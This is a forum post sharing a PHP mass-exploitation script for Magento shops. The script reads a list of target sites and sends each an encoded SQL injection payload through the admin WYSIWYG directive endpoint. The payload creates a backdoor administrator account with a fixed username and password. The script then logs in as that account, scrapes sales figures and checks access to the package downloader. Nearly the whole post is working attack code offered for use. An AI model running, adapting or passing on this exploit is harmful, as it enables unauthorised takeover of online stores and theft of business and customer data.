Hei Today I wanna share my script auto add admin magento 
PHP:
<?php
error_reporting(0);
set_time_limit(0);
$banner = '
#-----------------------------------------------------------#
# Magento Add Administrator Mass Exploiter V.3 #
# Coded By Hmei7 #
# Indonesian Hacker Rulez #
#-----------------------------------------------------------#
';
function bersihkan($htmltags) {
$htmltags = str_replace('<span class="price">','',$htmltags);
$htmltags = str_replace('</span>','',$htmltags);
return $htmltags;
}
$postadm = "filter=cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdoeWRyYTc3JykgKSwgQ09OQ0FUKCc6JywgQFNBTFQgKSk7U0VMRUNUIEBFWFRSQSA6PSBNQVgoZXh0cmEpIEZST00gYWRtaW5fdXNlciBXSEVSRSBleHRyYSBJUyBOT1QgTlVMTDtJTlNFUlQgSU5UTyBgYWRtaW5fdXNlcmAgKGBmaXJzdG5hbWVgLCBgbGFzdG5hbWVgLGBlbWFpbGAsYHVzZXJuYW1lYCxgcGFzc3dvcmRgLGBjcmVhdGVkYCxgbG9nbnVtYCxgcmVsb2FkX2FjbF9mbGFnYCxgaXNfYWN0aXZlYCxgZXh0cmFgLGBycF90b2tlbmAsYHJwX3Rva2VuX2NyZWF0ZWRfYXRgKSBWQUxVRVMgKCdGaXJzdG5hbWUnLCdMYXN0bmFtZScsJ2VtYWlsQGV4YW1wbGUuY29tJywnaHlkcmEnLEBQQVNTLE5PVygpLDAsMCwxLEBFWFRSQSxOVUxMLCBOT1coKSk7SU5TRVJUIElOVE8gYGFkbWluX3JvbGVgIChwYXJlbnRfaWQsdHJlZV9sZXZlbCxzb3J0X29yZGVyLHJvbGVfdHlwZSx1c2VyX2lkLHJvbGVfbmFtZSkgVkFMVUVTICgxLDIsMCwnVScsKFNFTEVDVCB1c2VyX2lkIEZST00gYWRtaW5fdXNlciBXSEVSRSB1c2VybmFtZSA9ICdoeWRyYScpLCdGaXJzdG5hbWUnKTs%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1";
$postlog = "form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77";
$postdwn = "username=hydra&password=hydra77";
$pageadm = "/admin/Cms_Wysiwyg/directive/index/";
$pagelog = "/admin/";
$pagedwn = "/downloader/";
function stupid_CURL($url,$data,$page) {
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url.$page);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
$headers = array();
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt ($ch, CURLOPT_HEADER, 1);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
print $banner;
$get=file_get_contents($argv[1])
or die("
\n\tError !
\n\tusage => php thisfile.php yourlist.txt\n\n");
$j=explode("\r\n",$get);
foreach($j as $site){
print "\n\n\t=> Checking : ".$site;
$hajar = stupid_CURL($site , $postadm, $pageadm);
if(preg_match('#200 OK#', $hajar)) {
$expres = "Success";
$ceklog = stupid_CURL($site , $postlog, $pagelog);
if(preg_match('#302 Moved#', $ceklog)) {
preg_match_all('#<span class="price">(.*?)</span>#si', $ceklog, $match);
foreach($match as $val)
{
$ltm = $val[0];
$avo = $val[1];
break;
}
$admlog = "Success";
$user = "hydra";
$pass = "hydra77";
$cekdwn = stupid_CURL($site , $postdwn, $pagedwn);
if(preg_match('#Return to Admin#', $cekdwn)) {
$dwnlog = "Login Success";
}else {
$dwnlog = "Login Failed";
}
}else {
$admlog = "Failed";
$user = "NULL";
$pass = "NULL";
}
}else {
$admlog = "Failed";
$expres = "Failed";
$user = "NULL";
$pass = "NULL";
$dwnlog = "Login Failed";
$ltm = "NULL";
$avo = "NULL";
}
echo '
+---------------------------------------------+
+-------Magento Add Admin-------------+
+---------------------------------------------+
| Exploiting : '.$expres.'
| Login Admin : '.$admlog.'
| Lifetime Sales: '.bersihkan($ltm).'
| Average Order : '.bersihkan($avo).'
| Downloader : '.$dwnlog.'
| Username : '.$user.'
| Password : '.$pass.'
+---------------------------------------------+
';
}
?>
